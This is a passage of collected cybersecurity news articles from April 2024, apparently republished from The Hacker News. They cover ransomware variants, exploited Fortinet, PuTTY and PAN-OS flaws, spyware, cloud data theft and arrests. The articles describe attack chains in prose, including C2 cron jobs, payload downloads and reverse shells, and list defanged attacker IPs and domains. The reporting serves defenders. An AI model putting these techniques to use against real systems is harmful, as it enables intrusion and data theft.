Ransomware actors are also leveraging the leaked LockBit ransomware source code to spawn their own custom variants like Lambda (aka Synapse), Mordor, and Zgut, according to reports from F.A.C.C.T. and Kaspersky.
The latter's analysis of the leaked LockBit 3.0 builder files has revealed the "alarming simplicity" with which attackers can craft bespoke ransomware and augment their capabilities with more potent features.
Kaspersky said it uncovered a tailored version with the ability to spread across the network via PsExec by taking advantage of stolen administrator credentials and performing malicious activities, such as terminating Microsoft Defender Antivirus and erasing Windows Event Logs in order to encrypt the data and cover its tracks.
"This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees," the company said.
Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign
17.4.24
Vulnerebility
The Hacker News
Cybersecurity researchers have discovered a new campaign that's exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun owing to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion targeted an unnamed media company that had its vulnerable FortiClient EMS device exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the flaw to unsuccessfully download ScreenConnect and then install the remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.
Also detected were SQL statements designed to download ScreenConnect from a
remote domain ("ursketz[.]com") using certutil, which was then installed via
msiexec before establishing connections with a command-and-control (C2) server.
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using Vietnamese and German languages in their infrastructure.
"The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are recommended to apply patches provided by Fortinet to address potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH
Services
17.4.24
Hacking
The Hacker News
Cisco is warning about a global
surge in brute-force attacks targeting various devices, including Virtual
Private Network (VPN) services, web application authentication interfaces, and
SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Cisco Talos said.
Successful attacks could pave the way for unauthorized network access, account lockouts, or denial-of-service conditions, the cybersecurity company added.
The attacks, said to be broad and opportunistic, have been observed targeting the below devices -
Cisco Secure Firewall VPN
Checkpoint VPN
Fortinet VPN
SonicWall VPN
RD Web Services
Mikrotik
Draytek
Ubiquiti
Cisco Talos described the
brute-forcing attempts as using both generic and valid usernames for specific
organizations, with the attacks indiscriminately targeting a wide range of
sectors across geographies.
The source IP addresses for the traffic are commonly associated with proxy services. This includes TOR, VPN Gate, IPIDEA Proxy, BigMama Proxy, Space Proxies, Nexus Proxy, and Proxy Rack, among others.
The complete list of indicators associated with the activity, such as the IP addresses and the usernames/passwords, can be accessed here.
The development comes as the networking equipment major warned of password spray attacks targeting remote access VPN services as part of what it said are "reconnaissance efforts."
It also follows a report from Fortinet FortiGuard Labs that threat actors are continuing to exploit a now-patched security flaw impacting TP-Link Archer AX21 routers (CVE-2023-1389, CVSS score: 8.8) to deliver DDoS botnet malware families like AGoent, Condi, Gafgyt, Mirai, Miori, and MooBot.
"As usual, botnets relentlessly target IoT vulnerabilities, continuously attempting to exploit them," security researchers Cara Lin and Vincent Li said.
"Users should be vigilant against DDoS botnets and promptly apply patches to safeguard their network environments from infection, preventing them from becoming bots for malicious threat actors."
OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt
16.4.24
Security
The Hacker News
Security researchers have uncovered
a "credible" takeover attempt targeting the OpenJS Foundation in a manner that
evokes similarities to the recently uncovered incident aimed at the open-source
XZ Utils project.
"The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails," OpenJS Foundation and Open Source Security Foundation (OpenSSF) said in a joint alert.
According to Robin Bender Ginn, executive director of OpenJS Foundation, and Omkhar Arasaratnam, general manager at OpenSSF, the email messages urged OpenJS to take action to update one of its popular JavaScript projects to remediate critical vulnerabilities without providing any specifics.
The email author(s) also called on OpenJS to designate them as a new maintainer of the project despite having little prior involvement. Two other popular JavaScript projects not hosted by OpenJS are also said to have been at the receiving end of similar activity.
That said, none of the people who contacted OpenJS were granted privileged access to the OpenJS-hosted project.
The incident brings into sharp focus the method by which the lone maintainer of XZ Utils was targeted by fictitious personas that were expressly created for what's believed to be a social engineering-cum-pressure campaign designed to make Jia Tan (aka JiaT75) a co-maintainer of the project.
This has raised the possibility that the attempt to sabotage XZ Utils may not be an isolated incident and that it's part of a broader campaign to undermine the security of various projects, the two open source groups said. The names of the JavaScript projects were not disclosed.
Jia Tan, as it stands, has no other digital footprints outside of their contributions, indicating that the account was invented for the sole purpose of gaining the credibility of the open-source development community over years and ultimately push a stealthy backdoor into XZ Utils.
It also serves to pinpoint the sophistication and patience that has gone behind planning and executing the campaign by targeting an open-source, volunteer-run project that's used in many Linux distributions, putting organizations and users at risk of supply chain attacks.
The XZ Utils backdoor incident also highlights the "fragility" of the open-source ecosystem and the risks created by maintainer burnout, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said last week.
"The burden of security shouldn't fall on an individual open-source maintainer — as it did in this case to near-disastrous effect," CISA officials Jack Cable and Aeva Black said.
"Every technology manufacturer that profits from open source software must do their part by being responsible consumers of and sustainable contributors to the open source packages they depend on."
The agency is recommending that technology manufacturers and system operators that incorporate open-source components should either directly or support the maintainers in periodically auditing the source code, eliminating entire classes of vulnerabilities, and implementing other secure by design principles.
"These social engineering attacks are exploiting the sense of duty that maintainers have with their project and community in order to manipulate them," Bender Ginn and Arasaratnam said.
"Pay attention to how interactions make you feel. Interactions that create self-doubt, feelings of inadequacy, of not doing enough for the project, etc. might be part of a social engineering attack."
TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks
16.4.24
Virus
The Hacker News
The threat actor tracked as TA558
has been observed leveraging steganography as an obfuscation technique to
deliver a wide range of malware such as Agent Tesla, FormBook, Remcos RAT,
LokiBot, GuLoader, Snake Keylogger, and XWorm, among others.
"The group made extensive use of steganography by sending VBSs, PowerShell code, as well as RTF documents with an embedded exploit, inside images and text files," Russian cybersecurity company Positive Technologies said in a Monday report.
The campaign has been codenamed SteganoAmor for its reliance on steganography and the choice of file names such as greatloverstory.vbs and easytolove.vbs.
A majority of the attacks have targeted industrial, services, public, electric power, and construction sectors in Latin American countries, although companies located in Russia, Romania, and Turkey have also been singled out.
The development comes as TA558 has also been spotted deploying Venom RAT via phishing attacks aimed at enterprises located in Spain, Mexico, the United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
It all starts with a phishing email containing a booby-trapped email Microsoft Excel attachment that exploits a now-patched security flaw in Equation Editor (CVE-2017-11882) to download a Visual Basic Script that, in turn, fetches the next-stage payload from paste[.]ee.
The obfuscated malicious code takes care of downloading two images from an external URL that come embedded with a Base64-encoded component that ultimately retrieves and executes the Agent Tesla malware on the compromised host.
Beyond Agent Tesla, other variants of the attack chain have led to an assortment of malware such as FormBook, GuLoader, LokiBot, Remcos RAT, Snake Keylogger, and XWorm, which are designed for remote access, data theft, and delivery of secondary payloads.
The phishing emails are sent from legitimate-but-compromised SMTP servers to lend the messages a little credibility and minimize the chances of them getting blocked by email gateways. In addition, TA558 has been found to use infected FTP servers to stage the stolen data.
The disclosure comes against the backdrop of a series of phishing attacks targeting government organizations in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia with a malware dubbed LazyStealer to harvest credentials from Google Chrome.
Positive Technologies is tracking the activity cluster under the name Lazy Koala in reference to the name of the user (joekoala), who is said to control the Telegram bots that receive the stolen data.
That said, the victim geography and the malware artifacts indicate potential links to another hacking group tracked by Cisco Talos under the name YoroTrooper (aka SturgeonPhisher).
"The group's main tool is a primitive stealer, whose protection helps to evade detection, slow down analysis, grab all the stolen data, and send it to Telegram, which has been gaining popularity with malicious actors by the year," security researcher Vladislav Lunin said.
The findings also follow a wave of social engineering campaigns that are designed to propagate malware families like FatalRAT and SolarMarker.
AWS, Google, and Azure CLI Tools Could Leak Credentials in Build Logs
16.4.24
Security
The Hacker News
New cybersecurity research has
found that command-line interface (CLI) tools from Amazon Web Services (AWS) and
Google Cloud can expose sensitive credentials in build logs, posing significant
risks to organizations.
The vulnerability has been codenamed LeakyCLI by cloud security firm Orca.
"Some commands on Azure CLI, AWS CLI, and Google Cloud CLI can expose sensitive information in the form of environment variables, which can be collected by adversaries when published by tools such as GitHub Actions," security researcher Roi Nisimi said in a report shared with The Hacker News.
Microsoft has since addressed the issue as part of security updates released in November 2023, assigned it the CVE identifier CVE-2023-36052 (CVSS score: 8.6).
The idea, in a nutshell, has to do with how the CLI commands such as could be used to show (pre-)defined environment variables and output to Continuous Integration and Continuous Deployment (CI/CD) logs. A list of such commands spanning AWS and Google Cloud is below 0
aws lambda get-function-configuration
aws lambda get-function
aws lambda
update-function-configuration
aws lambda update-function-code
aws lambda
publish-version
gcloud functions deploy <func> --set-env-vars
gcloud
functions deploy <func> --update-env-vars
gcloud functions deploy <func>
--remove-env-vars
Orca said it found several projects on GitHub that
inadvertently leaked access tokens and other sensitive data via Github Actions,
CircleCI, TravisCI, and Cloud Build logs.
Unlike Microsoft, however, both Amazon and Google consider this to be expected
behavior, requiring that organizations take steps to avoid storing secrets in
environment variables and instead use a dedicated secrets store service like AWS
Secrets Manager or Google Cloud Secret Manager.
Google also recommends the use of the "--no-user-output-enabled" option to suppress the printing of command output to standard output and standard error in the terminal.
"If bad actors get their hands on these environment variables, this could potentially lead to view sensitive information including credentials, such as passwords, user names, and keys, which could allow them to access any resources that the repository owners can," Nisimi said.
"CLI commands are by default assumed to be running in a secure environment, but coupled with CI/CD pipelines, they may pose a security threat."
Widely-Used PuTTY SSH Client Found Vulnerable to Key Recovery Attack
16.4.24
Vulnerebility
The Hacker News
The maintainers of the PuTTY Secure
Shell (SSH) and Telnet client are alerting users of a critical vulnerability
impacting versions from 0.68 through 0.80 that could be exploited to achieve
full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.
The flaw has been assigned the CVE identifier CVE-2024-31497, with the discovery credited to researchers Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.
"The effect of the vulnerability is to compromise the private key," the PuTTY project said in an advisory.
"An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for."
However, in order to obtain the signatures, an attacker will have to compromise the server for which the key is used to authenticate to.
In a message posted on the Open Source Software Security (oss-sec) mailing list, Bäumer described the flaw as stemming from the generation of biased ECDSA cryptographic nonces, which could enable the recovery of the private key.
"The first 9 bits of each ECDSA nonce are zero," Bäumer explained. "This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques."
"These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents."
Besides impacting PuTTY, it also affects other products that incorporate a vulnerable version of the software -
FileZilla (3.24.1 - 3.66.5)
WinSCP (5.9.5 - 6.3.2)
TortoiseGit (2.4.0.2 -
2.15.0)
TortoiseSVN (1.10.0 - 1.14.6)
Following responsible disclosure,
the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and
TortoiseGit 2.15.0.1. Users of TortoiseSVN are recommended to use Plink from the
latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch
becomes available.
Specifically, it has been resolved by switching to the RFC 6979 technique for all DSA and ECDSA key types, abandoning its earlier method of deriving the nonce using a deterministic approach that, while avoiding the need for a source of high-quality randomness, was susceptible to biased nonces when using P-521.
On top of that, ECDSA NIST-P521 keys used with any of the vulnerable components should be considered compromised and consequently revoked by removing them from authorized_keys files files and their equivalents in other SSH servers.
Hive RAT Creators and $3.5M Cryptojacking Mastermind Arrested in Global
Crackdown
16.4.24
Virus
The Hacker News
Two individuals have been arrested
in Australia and the U.S. in connection with an alleged scheme to develop and
distribute a remote access trojan called Hive RAT (previously Firebird).
The U.S. Justice Department (DoJ) said the malware "gave the malware purchasers control over victim computers and enabled them to access victims' private communications, their login credentials, and other personal information."
A 24-year-old individual named Edmond Chakhmakhchyan (aka "Corruption") from Van Nuys in Los Angeles, California, was taken into custody after he was caught selling a license of Hive RAT to an undercover employee of a law enforcement agency.
He has been charged with one count of conspiracy and one count of advertising a device as an interception device, each of which carries a penalty of five years in prison. Chakhmakhchyan pleaded not guilty and was ordered to stand trial on June 4, 2024.
Court documents allege a partnership between the malware's creator and the defendant under which the latter would post advertisements for the malware on a cybercrime forum called Hack Forums, accept cryptocurrency payments from customers, and offer product support.
Hive RAT comes with capabilities to terminate programs, browse files, record keystrokes, access incoming and outgoing communications, and steal victim passwords and other credentials for bank accounts and cryptocurrency wallets from victims' machines without their knowledge or consent.
"Chakhmakhchyan exchanged electronic messages with purchasers and explained to one buyer that the malware 'allowed the Hive RAT user to access another person's computer without that person knowing about the access,'" the DoJ said.
The Australian Federal Police (AFP), which announced charges of its own against a citizen for their purported involvement in the creation and sale of Hive RAT, said its investigation into the matter began in 2020.
The unnamed suspect faces 12 charges, including one count of producing data with intent to commit a computer offense, one count of controlling data with intent to commit a computer offense, and 10 counts of supplying data with intent to commit a computer offense. The maximum penalty for each of these offenses is three years imprisonment.
"Remote Access Trojans are one of the most harmful cyber threats in the online environment – once installed onto a device, a RAT can provide criminals with full access to, and control of the device," AFP Acting Commander Cybercrime Sue Evans said.
"This could include anything from committing crimes anonymously, watching victims through camera devices, wiping hard drives, or stealing banking credentials and other sensitive information."
Nebraska Man Indicted in Cryptojacking Scheme#
The development comes as
federal prosecutors in the U.S. indicted Charles O. Parks III (aka "CP3O"), 45,
for operating a massive illegal cryptojacking operation, defrauding "two
well-known providers of cloud computing services" out of more than $3.5 million
in computing resources to mine cryptocurrency worth nearly $1 million.
The indictment charges the Parks with wire fraud, money laundering, and engaging in unlawful monetary transactions. He was arrested on April 13, 2024. The wire fraud and money laundering charges carry a maximum sentence of 20 years' imprisonment. He also faces a 10 years' imprisonment on the unlawful monetary transactions charges.
While the DoJ does not explicitly state what cloud providers were targeted in the fraudulent operation, it noted that the companies are based in the Washington state cities of Seattle and Redmond – the corporate headquarters for Amazon and Microsoft.
"From in or about January 2021 through August 2021, Parks created and used a variety of names, corporate affiliations and email addresses, including emails with domains from corporate entities he operated [...] to register numerous accounts with the cloud providers and to gain access to massive amounts of computing processing power and storage that he did not pay for," the DoJ said.
The illicitly obtained resources were then used to mine cryptocurrencies such as Ether (ETH), Litecoin (LTC) and Monero (XMR), which were laundered through a network of cryptocurrency exchanges, a non-fungible token (NFT) marketplace, an online payment provider, and traditional bank accounts to conceal digital transaction trail.
The ill-gotten proceeds, prosecutors said, were ultimately converted into dollars, which Parks used to make various extravagant purchases that included a Mercedes Benz luxury car, jewelry, and first-class hotel and travel expenses.
"Parks tricked the providers into approving heightened privileges and benefits, including elevated levels of cloud computing services and deferred billing accommodations, and deflected inquiries from the providers regarding questionable data usage and mounting unpaid subscription balances," the DoJ said.
FTC Fines Mental Health Startup Cerebral $7 Million for Major Privacy Violations
16.4.24
BigBrothers
The Hacker News
The U.S. Federal Trade Commission
(FTC) has ordered the mental telehealth company Cerebral from using or
disclosing personal data for advertising purposes.
It has also been fined more than $7 million over charges that it revealed users' sensitive personal health information and other data to third parties for advertising purposes and failed to honor its easy cancellation policies.
"Cerebral and its former CEO, Kyle Robertson, repeatedly broke their privacy promises to consumers and misled them about the company's cancellation policies," the FTC said in a press statement.
While claiming to offer "safe, secure, and discreet" services in order to get consumers to sign up and provide their data, the company, FTC alleged, did not clearly disclose that the information would be shared with third-parties for advertising.
The agency also accused the company of burying its data sharing practices in dense privacy policies, with the company engaging in deceptive practices by claiming that it would not share users' data without their consent.
The company is said to have provided the sensitive information of nearly 3.2 million consumers to third parties such as LinkedIn, Snapchat, and TikTok by integrating tracking tools within its websites and apps that are designed to provide advertising and data analytics functions.
The information included names; medical and prescription histories; home and email addresses; phone numbers; birthdates; demographic information; IP addresses; pharmacy and health insurance information; and other health information.
The FTC complaint further accused Cerebral of failing to enforce adequate security guardrails by allowing former employees to access users' medical records from May to December 2021, using insecure access methods that exposed patient information, and not restricting access to consumer data to only those employees who needed it.
"Cerebral sent out promotional postcards, which were not in envelopes, to over 6,000 patients that included their names and language that appeared to reveal their diagnosis and treatment to anyone who saw the postcards," the FTC said.
Pursuant to the proposed order, which is pending approval from a federal court, the company has been barred from using or disclosing consumers' personal and health information to third-parties for marketing, and has been ordered to implement a comprehensive privacy and data security program.
Cerebral has also been asked to post a notice on its website alerting users of the FTC order, as well as adopt a data retention schedule and delete most consumer data not used for treatment, payment, or health care operations unless they have consented to it. It's also required to provide a mechanism for users to get their data deleted.
The development comes days after alcohol addiction treatment firm Monument was prohibited by the FTC from disclosing health information to third-party platforms such as Google and Meta for advertising without users' permission between 2020 and 2022 despite claiming such data would be "100% confidential."
The New York-based company has been ordered to notify users about the disclosure of their health information to third parties and ensure that all the shared data has been deleted.
"Monument failed to ensure it was complying with its promises and in fact disclosed users' health information to third-party advertising platforms, including highly sensitive data that revealed that its customers were receiving help to recover from their addiction to alcohol," FTC said.
Over the past year, FTC has announced similar enforcement actions against healthcare service providers like BetterHelp, GoodRx, and Premom for sharing users' data with third-party analytics and social media firms without their consent.
It also warned [PDF] Amazon against using patient data for marketing purposes after it finalized a $3.9 billion acquisition of membership-based primary care practice One Medical.
Intel and Lenovo BMCs Contain Unpatched Lighttpd Server Flaw
16.4.24
Vulnerebility
The Hacker News
A security flaw impacting the
Lighttpd web server used in baseboard management controllers (BMCs) has remained
unpatched by device vendors like Intel and Lenovo, new findings from Binarly
reveal.
While the original shortcoming was discovered and patched by the Lighttpd maintainers way back in August 2018 with version 1.4.51, the lack of a CVE identifier or an advisory meant that it was overlooked by developers of AMI MegaRAC BMC, ultimately ending up in products made by Intel and Lenovo.
Lighttpd (pronounced "Lighty") is an open-source high-performance web server software designed for speed, security, and flexibility, while optimized for high-performance environments without consuming a lot of system resources.
The silent fix for Lighttpd concerns an out-of-bounds read vulnerability that could be exploited to exfiltrate sensitive data, such as process memory addresses, thereby allowing threat actors to bypass crucial security mechanisms like address space layout randomization (ASLR).
"The absence of prompt and important information about security fixes prevents proper handling of these fixes down both the firmware and software supply chains," the firmware security company said.
The flaws are described below -
Out-of-bounds read in Lighttpd 1.4.45 used in Intel M70KLP series firmware
Out-of-bounds read in Lighttpd 1.4.35 used in Lenovo BMC firmware
Out-of-bounds read in Lighttpd before 1.4.51
Intel and Lenovo have opted not
to address the issue as the products incorporating the susceptible version of
Lighttpd have hit end-of-life (EoL) status and are no longer eligible for
security updates, effectively turning it into a forever-day bug.
The disclosure highlights how the presence of outdated third-party components in
the latest version of firmware can traverse the supply chain and pose unintended
security risks for end users.
"This is yet another vulnerability that will remain unfixed forever in some products and will present high-impact risk to the industry for a very long time," Binarly added.
Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft
Attacks
16.4.24
APT
The Hacker News
The threat actor known as Muddled
Libra has been observed actively targeting software-as-a-service (SaaS)
applications and cloud service provider (CSP) environments in a bid to
exfiltrate sensitive data.
"Organizations often store a variety of data in SaaS applications and use services from CSPs," Palo Alto Networks Unit 42 said in a report published last week.
"The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work."
Muddled Libra, also called Starfraud, UNC3944, Scatter Swine, and Scattered Spider, is a notorious cybercriminal group that has leveraged sophisticated social engineering techniques to gain initial access to target networks.
"Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs," the U.S. government said in an advisory late last year.
The attackers also have a history of monetizing access to victim networks in numerous ways, including extortion enabled by ransomware and data theft.
Unit 42 previously told The Hacker News that the moniker "Muddled Libra" comes from the "confusing muddled landscape" associated with the 0ktapus phishing kit, which has been put to use by other threat actors to stage credential harvesting attacks.
A key aspect of the threat actor's tactical evolution is the use of reconnaissance techniques to identify administrative users to target when posing as helpdesk staff using phone calls to obtain their passwords.
The recon phase also extends to Muddled Libra carrying out extensive research to find information about the applications and the cloud service providers used by the target organizations.
"The Okta cross-tenant impersonation attacks that occurred from late July to early August 2023, where Muddled Libra bypassed IAM restrictions, display how the group exploits Okta to access SaaS applications and an organization's various CSP environments," security researcher Margaret Zimmermann explained.
The information obtained at this stage serves as a stepping stone for conducting
lateral movement, abusing the admin credentials to access single sign-on (SSO)
portals to gain quick access to SaaS applications and cloud infrastructure.
In the event SSO is not integrated into a target's CSP, Muddled Libra undertakes broad discovery activities to uncover the CSP credentials, likely stored in unsecured locations, to meet their objectives.
The data stored with SaaS applications are also used to glean specifics about the infected environment, capturing as many credentials as possible to widen the scope of the breach via privilege escalation and lateral movement.
"A large portion of Muddled Libra's campaigns involve gathering intelligence and data," Zimmermann said.
"Attackers then use this to generate new vectors for lateral movement within an environment. Organizations store a variety of data within their unique CSP environments, thus making these centralized locations a prime target for Muddled Libra."
The discovery actions specifically single out Amazon Web Services (AWS) and Microsoft Azure, targeting services like AWS IAM, Amazon Simple Storage Service (S3), AWS Secrets Manager, Azure storage account access keys, Azure Blob Storage, and Azure Files to extract relevant data.
Data exfiltration is achieved by abusing legitimate CSP services and features. This encompasses tools like AWS DataSync, AWS Transfer, and a technique called snapshot, the latter of which makes it possible to move data out of an Azure environment by staging the stolen data in a virtual machine.
Muddled Libra's tactical shift requires organizations to secure their identity portals with robust secondary authentication protections like hardware tokens or biometrics.
"By expanding their tactics to include SaaS applications and cloud environments, the evolution of Muddled Libra's methodology shows the multidimensionality of cyberattacks in the modern threat landscape," Zimmermann concluded. "The use of cloud environments to gather large amounts of information and quickly exfiltrate it poses new challenges to defenders."
Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users
15.4.24
OS
The Hacker News
Cybersecurity researchers have
discovered a "renewed" cyber espionage campaign targeting users in South Asia
with the aim of delivering an Apple iOS spyware implant called LightSpy.
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last week.
There is evidence to suggest that the campaign may have targeted India based on VirusTotal submissions from within its borders.
First documented in 2020 by Trend Micro and Kaspersky, LightSpy refers to an advanced iOS backdoor that's distributed via watering hole attacks through compromised news sites.
A subsequent analysis from ThreatFabric in October 2023 uncovered infrastructure and functionality overlaps between the malware and an Android spyware known as DragonEgg, which is attributed to the Chinese nation-state group APT41 (aka Winnti).
The initial intrusion vector is presently not known, although it's suspected to be via news websites that have been breached and are known to be visited by the targets on a regular basis.
The starting point is a first-stage loader that acts as a launchpad for the core LightSpy backdoor and its assorted plugins that are retrieved from a remote server to pull off the data-gathering functions.
LightSpy is both fully-featured and modular, allowing threat actors to harvest
sensitive information, including contacts, SMS messages, precise location data
and sound recordings during VoIP calls.
The latest version discovered by the Canadian cybersecurity firm further expands on its capabilities to steal files as well as data from popular apps like Telegram, QQ, and WeChat, iCloud Keychain data, and web browser history from Safari and Google Chrome.
The complex espionage framework also features capabilities to gather a list of connected Wi-Fi networks, details about installed apps, take pictures using the device's camera, record audio, and execute shell commands received from the server, likely enabling it to hijack control of the infected devices.
"LightSpy employs certificate pinning to prevent detection and interception of communication with its command-and-control (C2) server," Blackberry said. "Thus, if the victim is on a network where traffic is being analyzed, no connection to the C2 server will be established."
A further examination of the implant's source code suggests the involvement of native Chinese speakers, raising the possibility of state-sponsored activity. What's more, LightSpy communicates with a server located at 103.27[.]109[.]217, which also hosts an administrator panel that displays an error message in Chinese when entering incorrect login credentials.
The development comes as Apple said it sent out threat notifications to users in 92 countries, counting India, that they may have been targeted by mercenary spyware attacks.
"The return of LightSpy, now equipped with the versatile 'F_Warehouse' framework, signals an escalation in mobile espionage threats," BlackBerry said.
"The expanded capabilities of the malware, including extensive data exfiltration, audio surveillance, and potential full device control, pose a severe risk to targeted individuals and organizations in Southern Asia."
Palo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability
15.4.24
Vulnerebility
The Hacker News
Palo Alto Networks has released
hotfixes to address a maximum-severity security flaw impacting PAN-OS software
that has come under active exploitation in the wild.
Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root privileges on the firewall.
Fixes for the shortcoming are available in the following versions -
PAN-OS 10.2.9-h1
PAN-OS 11.0.4-h1, and
PAN-OS 11.1.2-h3
Patches for
other commonly deployed maintenance releases are expected to be released over
the next few days.
"This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled," the company clarified in its updated advisory.
It also said that while Cloud NGFW firewalls are not impacted by CVE-2024-3400, specific PAN-OS versions and distinct feature configurations of firewall VMs deployed and managed by customers in the cloud are affected.
The exact origins of the threat actor exploiting the flaw are presently unknown but Palo Alto Networks Unit 42 is tracking the malicious activity under the name Operation MidnightEclipse.
Volexity, which attributed it to a cluster dubbed UTA0218, said CVE-2024-3400 has been leveraged since at least March 26, 2024, to deliver a Python-based backdoor called UPSTYLE on the firewall that allows for the execution of arbitrary commands via specially crafted requests.
It is unclear how widespread the exploitation has been, but the threat intelligence firm said it has "evidence of potential reconnaissance activity involving more widespread exploitation aimed at identifying vulnerable systems."
In attacks documented to date, UTA0218 has been observed deploying additional payloads to launch reverse shells, exfiltrate PAN-OS configuration data, remove log files, and deploy the Golang tunneling tool named GOST (GO Simple Tunnel).
No other follow-up malware or persistence methods are said to have been deployed on victim networks, although it's unknown if it's by design or due to early detection and response.
Ex-Security Engineer Jailed 3 Years for $12.3 Million Crypto Exchange Thefts
14.4.24
Crime
The Hacker News
A former security engineer has been
sentenced to three years in prison in the U.S. for charges relating to hacking
two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3
million.
Shakeeb Ahmed, the defendant in question, pled guilty to one count of computer fraud in December 2023 following his arrest in July.
"At the time of both attacks, Ahmed, a U.S. citizen, was a senior security engineer for an international technology company whose resume reflected skills in, among other things, reverse engineering smart contracts and blockchain audits, which are some of the specialized skills Ahmed used to execute the hacks," the U.S. Department of Justice (DoJ) noted at the time.
While the name of the company was not disclosed, he was residing in Manhattan, New York, and working for Amazon before he was apprehended.
Court documents show that Ahmed exploited a security flaw in an unnamed cryptocurrency exchange's smart contracts to insert "fake pricing data to fraudulently generate millions of dollars' worth of inflated fees," which he was able to withdraw.
Subsequently, he initiated contact with the company and agreed to return most of the funds except for $1.5 million if the exchange agreed not to alert law enforcement about the flash loan attack.
It's worth noting that CoinDesk reported in early July 2022 that an unknown attacker returned more than $8 million worth of cryptocurrency to a Solana-based crypto exchange called Crema Finance, while keeping $1.68 million as a "white hat" bounty.
Ahmed has also been accused of carrying out an attack on a second decentralized cryptocurrency exchange called Nirvana Finance, siphoning $3.6 million in the process, ultimately leading to its shutdown.
"Ahmed used an exploit he discovered in Nirvana's smart contracts to allow him to purchase cryptocurrency from Nirvana at a lower price than the contract was designed to allow," the DoJ said.
"He then immediately resold that cryptocurrency to Nirvana at a higher price. Nirvana offered Ahmed a 'bug bounty' of as much as $600,000 to return the stolen funds, but Ahmed instead demanded $1.4 million, did not reach agreement with Nirvana, and kept all the stolen funds."
The defendant then laundered the stolen funds to cover up the trail using cross-chain bridges to move the illicit digital assets from Solana to Ethereum and exchanging the proceeds into Monero using mixers like Samourai Whirlpool.
Besides the three-year jail term, Ahmed has been sentenced to three years of supervised release and ordered to forfeit approximately $12.3 million and pay restitution amounting more than $5 million to both the impacted crypto exchanges.
Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack
13.4.24
Virus
The Hacker News
Threat actors have been exploiting
the newly disclosed zero-day flaw in Palo Alto Networks PAN-OS software dating
back to March 26, 2024, nearly three weeks before it came to light yesterday.
The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of unknown provenance.
The security vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), is a command injection flaw that enables unauthenticated attackers to execute arbitrary code with root privileges on the firewall.
It's worth noting that the issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewall configurations that have GlobalProtect gateway and device telemetry enabled.
Operation MidnightEclipse entails the exploitation of the flaw to create a cron job that runs every minute to fetch commands hosted on an external server ("172.233.228[.]93/policy" or "172.233.228[.]93/patch"), which are then executed using the bash shell.
The attackers are said to have manually managed an access control list (ACL) for the command-and-control (C2) server to ensure that it can only be accessed from the device communicating with it.
While the exact nature of the command is unknown, it's suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall that Volexity – which discovered in-the-wild exploitation of CVE-2024-3400 on April 10, 2024 – is tracking as UPSTYLE and is hosted on a different server ("144.172.79[.]92" and "nhdata.s3-us-west-2.amazonaws[.]com").
The Python file is designed to write and launch another Python script ("system.pth"), which subsequently decodes and runs the embedded backdoor component that's responsible for executing the threat actor's commands in a file called "sslvpn_ngx_error.log." The results of the operation are written to a separate file named "bootstrap.min.css."
